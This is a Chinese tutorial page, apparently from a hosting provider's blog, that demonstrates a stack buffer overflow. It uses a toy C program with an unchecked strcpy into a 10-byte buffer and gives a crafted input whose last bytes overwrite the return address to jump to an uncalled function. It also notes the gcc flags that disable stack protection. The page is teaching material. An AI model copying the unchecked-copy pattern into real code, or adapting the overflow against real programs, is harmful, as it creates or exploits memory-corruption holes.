您好,登录后才能下订单哦!
密码登录
登录注册
点击 登录注册 即表示同意《亿速云用户服务条款》
#include<stdlib.h> #include<string.h> void fun(char *name){ char buf[10]; strcpy(buf,name); printf("%s\n",buf); } void hack(){ printf("flag\n"); } int main(){ char name[]="Alex@bbb"; fun(name); return 0; }
上面的程序是一个正常的C语言程序,但是main函数中没有调用hack()函数,下面我就演示下如何利用缓冲区溢出来执行hack函数的内容。
使用codeblocks编译并执行上述程序后,拖入od查看栈的变化情况,看看给变量name赋什么值的时候,会恰好覆盖掉call fun处的函数返回地址
F7跟进 F8 一句一句执行:
因此我们添加poc:
#include<stdlib.h> #include<string.h> void fun(char *name){ char buf[10]; strcpy(buf,name); printf("%s\n",buf); } void hack(){ printf("flag\n"); } int main(){ char name[]="Alex@bbbaaaaaaaaaaaaaa\x59\x13\x40\00"; //这里后边四个为hack()函数地址 fun(name); return 0; }
重新编译执行后,我们发现利用成功:
在使用ubuntu复现栈溢出的时候需要关闭栈保护机制:
使用gcc编译时全部关闭保护机制,参数-fno-stack-protector用来关闭gcc编译器gs验证码机制,
-z execstack用来关闭ld链接器堆栈段不可执行机制。
这里有一个linux下64位的栈溢出过程。
https://www.secpulse.com/archives/32328.html
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。